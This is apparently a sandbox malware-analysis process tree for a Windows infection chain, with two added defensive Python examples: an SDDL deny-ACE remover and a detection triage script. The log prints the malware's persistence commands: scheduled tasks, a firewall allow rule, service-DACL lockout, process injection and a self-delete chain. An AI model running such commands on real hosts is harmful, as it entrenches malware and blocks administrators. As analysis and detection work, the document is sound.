C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)4⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
- Launches sc.exe
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
-
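The two `sc sdset` calls above (one against WmiPrvSE from the dropped csrss.exe, one against the dropped "WinDefender" service, which is the sample's own service name and not Windows Defender's real `WinDefend` service) rewrite the service security descriptor. The allow and audit ACEs in that string are the stock descriptor most Windows services show under `sc sdshow`; the only addition is `(D;;WPDT;;;BA)`, a deny ACE that stops members of Administrators from stopping (WP) or pausing (DT) the service. The following is an added example, not code from the report or the sandbox: a small SDDL parser that pulls out exactly that kind of control denial and rebuilds the descriptor without it, so a responder can hand the result straight back to `sc sdset`. The sample descriptor is copied from the command lines above; the default descriptor is the stock Windows one. The parser ignores the object-GUID fields and DACL flags, which are empty in every service descriptor in this report.

```python
import re
from dataclasses import dataclass

# Two-letter SDDL right tokens that give control over a service, with the
# control each one grants on the Service Control Manager.
SERVICE_CONTROL_RIGHTS = {
    "WP": "stop",
    "DT": "pause/continue",
    "DC": "change config",
    "SD": "delete",
    "WD": "change DACL",
    "WO": "change owner",
}

# Copied from the sc sdset command lines in the process tree.
SAMPLE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
    "(D;;WPDT;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)"
    "(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# Stock descriptor that most Windows services report under `sc sdshow`.
DEFAULT_SERVICE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)"
    "(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)


@dataclass(frozen=True)
class Ace:
    ace_type: str    # "A" allow, "D" deny, "AU" audit
    flags: str       # ACE flags, e.g. "FA" (failed+successful audit)
    rights: tuple    # two-letter right tokens, or a single "0x..." mask
    sid: str         # SDDL alias (BA, SY, IU, ...) or an S-1-... string


_ACE_RE = re.compile(r"\(([^)]*)\)")


def _split_rights(rights: str) -> tuple:
    # Rights are written as concatenated two-letter tokens, e.g. "WPDT".
    if rights.startswith("0x"):
        return (rights,)
    if len(rights) % 2:
        raise ValueError(f"odd-length rights string: {rights!r}")
    return tuple(rights[i:i + 2] for i in range(0, len(rights), 2))


def _parse_ace(body: str) -> Ace:
    fields = body.split(";")
    if len(fields) != 6:
        raise ValueError(f"ACE must have 6 fields: {body!r}")
    ace_type, flags, rights, _object_guid, _inherit_guid, sid = fields
    return Ace(ace_type, flags, _split_rights(rights), sid)


def parse_sddl(sddl: str) -> dict:
    """Split an SDDL string into its DACL and SACL ACE lists (owner/group ignored)."""
    dacl_part, _, sacl_part = sddl.partition("S:")
    if "D:" not in dacl_part:
        raise ValueError("no DACL in SDDL string")
    dacl_part = dacl_part.split("D:", 1)[1]
    return {
        "dacl": [_parse_ace(a) for a in _ACE_RE.findall(dacl_part)],
        "sacl": [_parse_ace(a) for a in _ACE_RE.findall(sacl_part)],
    }


def find_control_denials(sddl: str) -> list:
    """Return (sid, [denied controls]) for every deny ACE that blocks service control."""
    findings = []
    for ace in parse_sddl(sddl)["dacl"]:
        if ace.ace_type != "D":
            continue
        denied = [SERVICE_CONTROL_RIGHTS[r] for r in ace.rights if r in SERVICE_CONTROL_RIGHTS]
        if denied:
            findings.append((ace.sid, denied))
    return findings


def strip_deny_aces(sddl: str) -> str:
    """Rebuild the descriptor without deny ACEs, ready to pass back to `sc sdset`."""
    parsed = parse_sddl(sddl)

    def render(ace: Ace) -> str:
        return f"({ace.ace_type};{ace.flags};{''.join(ace.rights)};;;{ace.sid})"

    dacl = "".join(render(a) for a in parsed["dacl"] if a.ace_type != "D")
    sacl = "".join(render(a) for a in parsed["sacl"])
    return "D:" + dacl + ("S:" + sacl if sacl else "")


if __name__ == "__main__":
    for sid, denied in find_control_denials(SAMPLE_SDDL):
        print(f"deny ACE for {sid}: blocks {', '.join(denied)}")
    print("remediation: sc sdset WinDefender " + strip_deny_aces(SAMPLE_SDDL))
```

Run it against the output of `sc sdshow <service>` on a suspect host; a deny ACE on WP/DT for BA (or on DC/SD/WD/WO, which would also lock out reconfiguration and deletion) is not something a legitimate installer writes, and `strip_deny_aces` gives the descriptor to restore once the binary behind the service has been removed.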
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe4⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f5⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exeC:\Users\Admin\AppData\Local\Temp\1CEC.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exeC:\Users\Admin\AppData\Local\Temp\1CEC.exe2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exe"C:\Users\Admin\AppData\Local\Temp\1CEC.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1CEC.exe"C:\Users\Admin\AppData\Local\Temp\1CEC.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe"6⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe" & del C:\PrograData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build3.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- DcRat
- Creates scheduled task(s)
-
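The chain above contains the persistence and clean-up moves a hunter would want rules for: the ONLOGON task with `/RL HIGHEST` pointing at a csrss.exe that lives in `C:\Windows\rss` rather than System32, the `netsh advfirewall` allow rule for that same dropped binary, the `sc sdset` rewrite, the cmd.exe `taskkill & timeout & del` self-delete after build2.exe ran, and build3.exe's `Azure-Update-Task`, which re-runs mstsca.exe every minute. The following is an added example, not code from the report or the sandbox: a small triage pass over (image path, command line) pairs copied from this tree, plus one constructed benign task for contrast. Note that build3.exe's schtasks call arrives with `/C` as its first token and no "schtasks" in the command line at all, so the rules key on the image name, not on the command line. The `SUSPECT_DIRS` and `SYSTEM_NAMES` lists are hypothetical starting points to tune per estate.

```python
import re

# Drop locations used by the chain above. Hypothetical starting list.
SUSPECT_DIRS = ("\\windows\\rss\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# System binary names the sample borrows; the real csrss.exe lives only in System32.
SYSTEM_NAMES = {"csrss.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "wininit.exe"}

# (image, command line) pairs copied from the process tree; the last one is constructed and benign.
SAMPLE_EVENTS = [
    (r"C:\Windows\SYSTEM32\schtasks.exe",
     r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'),
    (r"C:\Windows\system32\netsh.exe",
     r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes'),
    (r"C:\Windows\SysWOW64\sc.exe",
     r'sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\f8e2336a-1677-4fe9-a4a8-55fa48898222\build2.exe" & del C:\PrograData\*.dll & exit'),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"'),
    (r"C:\Windows\SYSTEM32\schtasks.exe",
     r'schtasks /delete /tn ScheduledUpdate /f'),
    (r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /tn "NightlyBackup" /sc daily /st 02:00 /tr "C:\Program Files\Backup\backup.exe"'),
]


def _basename(path: str) -> str:
    return path.strip('"').lower().rsplit("\\", 1)[-1]


def _arg_after(flag: str, cmdline: str) -> str:
    """Value following a schtasks-style flag such as /TR, quoted or bare ('' if absent)."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def _in_suspect_dir(path: str) -> bool:
    return any(d in path.lower() for d in SUSPECT_DIRS)


def _masquerades(path: str) -> bool:
    # A system binary name outside System32/SysWOW64, like C:\Windows\rss\csrss.exe.
    p = path.lower()
    return (_basename(p) in SYSTEM_NAMES
            and "\\windows\\system32\\" not in p
            and "\\windows\\syswow64\\" not in p)


def classify(image: str, cmdline: str) -> list:
    """Return the sorted list of rule names that fire for one process-creation event."""
    tool = _basename(image)
    low = cmdline.lower()
    tags = set()
    if tool == "schtasks.exe" and "/create" in low:
        target = _arg_after("/tr", cmdline)
        if _in_suspect_dir(target) or _masquerades(target):
            tags.add("task_persistence")
        if "/rl highest" in low:
            tags.add("task_runs_elevated")
        if re.search(r"/sc\s+minute\s+/mo\s+1\b", low):
            tags.add("task_every_minute")
    if tool == "netsh.exe" and "advfirewall" in low and "action=allow" in low:
        m = re.search(r'program="?([^"\s]+)"?', cmdline, re.I)
        if m and (_in_suspect_dir(m.group(1)) or _masquerades(m.group(1))):
            tags.add("firewall_allow_dropped_binary")
    if tool == "cmd.exe" and "taskkill" in low and "timeout" in low and re.search(r"\bdel\b", low):
        tags.add("self_delete_chain")
    if tool == "sc.exe" and re.search(r"\bsdset\b", low):
        tags.add("service_dacl_rewrite")
    return sorted(tags)


def scan(events) -> dict:
    """Map each command line that fires at least one rule to its rule names."""
    hits = {}
    for image, cmdline in events:
        tags = classify(image, cmdline)
        if tags:
            hits[cmdline] = tags
    return hits


if __name__ == "__main__":
    for cmdline, tags in scan(SAMPLE_EVENTS).items():
        print(", ".join(tags), "<-", cmdline[:80])
```

Feed it Sysmon event 1 or EDR process-creation records with the same two fields; the benign daily backup task and the `schtasks /delete` call fall through, while each of the five malicious lines gets at least one tag.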
C:\Users\Admin\AppData\Local\Temp\3EEC.exeC:\Users\Admin\AppData\Local\Temp\3EEC.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 24400 -s 8722⤵
- Program crash
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 24400 -ip 244001⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"1⤵
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultcf181a94h683bh4895h9aa3hb1821fc5d9361⤵
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc693546f8,0x7ffc69354708,0x7ffc693547182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13125924653994887955,11332406325770881414,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,13125924653994887955,11332406325770881414,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,13125924653994887955,11332406325770881414,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault7d5de6behba09h417eh9b35h517f5e591fd21⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6bab46f8,0x7ffc6bab4708,0x7ffc6bab47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9862538726728582456,14984541969093872141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,9862538726728582456,14984541969093872141,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2576 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,9862538726728582456,14984541969093872141,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault7a95d11bh78d3h48edhb7b4hcb0b278b36a71⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6bab46f8,0x7ffc6bab4708,0x7ffc6bab47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,941998987165426854,2225039285888782487,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,941998987165426854,2225039285888782487,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,941998987165426854,2225039285888782487,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:32⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault5453c971h7adbh49d8h89b8hc064de5018561⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6bab46f8,0x7ffc6bab4708,0x7ffc6bab47182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,14901281254086696735,4316719583474350271,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,14901281254086696735,4316719583474350271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,14901281254086696735,4316719583474350271,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\ddefwhhC:\Users\Admin\AppData\Roaming\ddefwhh1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 19588 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 19588 -ip 195881⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:?launchContext1=Microsoft.Windows.Cortana_cw5n1h2txyewy&url=https%3A%2F%2Fwww.bing.com%2Fsearch%3Fq%3Dproexp%26form%3DWNSGPH%26qs%3DSW%26cvid%3D57b1c4ab73a548f7982ccc54f5fc2fd3%26pq%3Dproexp%26cc%3DUS%26setlang%3Den-US%26nclid%3D03E26D907E30E8998728BC8DB27F263E%26ts%3D1663014022330%26nclidts%3D1663014022%26tsms%3D3301⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd8,0x110,0x7ffc6ba946f8,0x7ffc6ba94708,0x7ffc6ba947182⤵
-
